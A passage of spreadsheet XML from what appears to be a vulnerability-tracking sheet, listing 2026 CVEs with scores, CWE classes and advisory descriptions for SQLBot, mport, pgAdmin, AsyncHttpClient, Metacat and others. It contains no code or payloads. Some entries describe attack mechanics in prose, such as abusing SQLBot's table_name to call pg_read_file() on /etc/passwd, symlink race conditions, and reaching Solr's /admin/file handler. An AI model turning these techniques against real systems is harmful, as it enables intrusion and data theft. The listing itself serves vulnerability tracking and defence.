      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55946</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53556</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, the POST /api/v1/datasource/previewData endpoint in backend/apps/datasource/crud/datasource.py incorporates the client-controlled table_name value into generated SQL without safe identifier handling. An authenticated user can configure a datasource for SQLBot's internal PostgreSQL service and submit a crafted table_name that remains a SELECT operation under the read-only policy while invoking pg_read_file(), pg_read_binary_file(), or pg_ls_dir(). In the default tested trusted loopback authentication configuration, the internal connection accepts invalid credentials and executes with PostgreSQL superuser privileges, allowing filesystem content such as /etc/hosts and /etc/passwd to be returned in the previewData API response and potentially exposing configuration, credentials, authentication secrets, and source code. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53556</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54582</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-668, CWE-73</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, package installation lacked a preflight check for incoming non-directory assets that already existed on disk. The affected logic across libmport/check_preconditions.c, libmport/install_primative.c, and libmport/mport_private.h did not apply MPORT_PRECHECK_FILE_CONFLICTS, so a crafted or conflicting package could overwrite a file owned by another package or unmanaged by mport. The check is bypassed only when the operator explicitly enables mport-&gt;force. Privileged installation without that override could compromise local filesystem integrity and package database consistency. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54582</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54585</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, create_sample_file() in libmport/bundle_read_install_pkg.c did not constrain absolute source and destination paths from the sample-file manifest directive to mport-&gt;root. A malicious or malformed package manifest could therefore direct privileged sample-file handling to copy or write outside the configured installation root, compromising local filesystem integrity. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54585</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54586</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-345</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, the mport_fetch_index(), mport_fetch_bootstrap_index(), and mport_fetch_bundle() paths in libmport/fetch.c accepted non-HTTPS repository and package mirror URLs without a url_is_https() enforcement check. When a cleartext URL was configured or returned by mirror data, a network-positioned attacker could tamper with package index or package download traffic and compromise package selection or integrity. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54586</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86861</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-59</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's File Manager save_file endpoint, which backs saving from the Query Tool and ERD, validated the requested path with Filemanager.check_access_permission() and then opened the file for writing with a plain open() call. CVE-2026-7819 had previously hardened the separate file upload path by opening its target with O_NOFOLLOW, so that the kernel refuses to follow a symbolic link at the final path component, but save_file was left on an unprotected open(). A symbolic link already present when the check ran was rejected by the check itself; the remaining exposure was a link substituted at the final path component in the interval between the check and the write, at which point the write followed the link and landed outside the user's storage directory, creating or overwriting an arbitrary file as the operating-system account running pgAdmin.
Exploitation requires the ability to create or replace a symbolic link inside the requesting user's storage directory. pgAdmin exposes no interface that creates symbolic links, so this requires filesystem access to the pgAdmin host or to a shared or network-mounted storage backend, together with winning the timing window. The reporter did not achieve a write against a released version, having attempted approximately 63,000 racing requests without success; the reported defect is the uncovered write path rather than a demonstrated sandbox escape.
The fix routes save_file's write through the same O_NOFOLLOW-protected helper already used by the upload path, so both File Manager write sinks carry identical kernel-enforced protection, and reports a symbolic-link refusal explicitly instead of surfacing the underlying system error text. Note that files created by save_file are now given mode 0600, inheriting the behaviour introduced for uploads. The protection covers the final path component; substitution of an intermediate directory component is not addressed by this change.
This issue affects pgAdmin 4: from the introduction of the containment check in the File Manager save path before 9.18.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86861</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75523</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Management.Endpoint</t>
        </is>
      </c>
      <c r="M291" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. Prior to 4.3.0, the Steeltoe.Management.Endpoint /actuator/httpexchanges endpoint passes recorded request URIs through MaskedUri, which masks URI user information but does not inspect query strings. When Management:Endpoints:HttpExchanges:IncludeQueryString is enabled, the HttpExchangeRequest response can disclose OAuth tokens, password-reset tokens, signed-URL signatures, API keys, and other query-string secrets from prior traffic to a caller that can reach the explicitly exposed endpoint. The Steeltoe.Management.Endpoint.Actuators.HttpExchanges DEBUG logger also records these URIs, creating a second disclosure channel for users with log access. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75523</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85718</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 3.0.8 until 3.0.12, a client with maxConnections or maxConnectionsPerHost set above zero leaks one connection permit whenever TLS connection establishment fails before the handshake completes. NettyConnectListener removes the partitionKeyLock permit from NettyResponseFuture before every failure path is bound to the channel closeFuture, so an abort can leave the permit unreleased. Repeated failures can permanently lock out one host under a per-host limit or drain the shared pool under a global limit, blocking later requests even when no connection remains open. The default unlimited connection setting is not affected. This issue is fixed in version 3.0.12.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85718</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85720</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M293" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, a request using an HTTP proxy to reach an HTTPS origin can expose preemptive origin credentials because NettyRequestFactory and NettyRequestSender.sendRequestWithNewChannel attach Authorization to the plaintext CONNECT request before the TLS tunnel exists. Basic or Digest credentials and per-connection NTLM, Kerberos, or SPNEGO tokens intended for the origin are therefore visible to the proxy and to observers on the client-to-proxy hop. The tunneled request still receives origin Authorization after the tunnel is established, while Proxy-Authorization remains on CONNECT for its intended proxy recipient. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85720</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50022</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>Metacat is data repository software that helps researchers preserve, share, and discover data. Prior to 3.4.2, MetacatSolrIndex.query forwards the client-controlled qt parameter through Apache SolrJ from search endpoints such as /d1/mn/v2/query/solr/ to its privileged Solr backend. An unauthenticated client can select the /admin/file handler, and SolrJ reformats the parameter into a request accepted even when handleSelect=false is configured on Solr 7.0 or later. When Solr returns the selected core configuration file, Metacat embeds the raw content in an XML processing error response, disclosing internal files such as solrconfig.xml and enabling infrastructure profiling. This issue is fixed in version 3.4.2.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50022</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54575</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-78</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, privileged package fetch and cache-cleaning operations used race-prone path handling across libmport/fetch.c, libmport/clean.c, libmport/util.c, libmport/bundle_read_install_pkg.c, libmport/delete_primative.c, and libexec/mport.create/mport.create.c. A local attacker with write access to a participating package cache or staging path could race path checks and replacement operations to redirect package downloads, cleanup, or install-related side effects outside the intended cache. The affected lifecycle helper paths also used shell-form invocation, increasing command-line interpretation risk during privileged helper execution. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54575</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54576</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-59</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, do_actual_install() in libmport/bundle_read_install_pkg.c used path-based lstat(), chown(), stat(), and chmod() operations while installing package files. A local attacker with write access to a target directory could replace a checked file with a symlink before privileged ownership or mode changes were applied, redirecting those changes to an attacker-selected path and compromising filesystem integrity or permissions. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54576</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54587</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-59</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, directory assets handled as ASSET_DIR or ASSET_DIR_OWNER_MODE in libmport/bundle_read_install_pkg.c used path-based mport_mkdirp(), ownership, and permission operations. A local attacker able to modify part of the target installation tree could use dot-dot traversal or substitute symlinks during privileged package installation, causing directory creation or attribute changes to affect attacker-selected paths outside the intended package directories. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54587</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81479</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-187</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Partial String Comparison vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81479</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92933</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
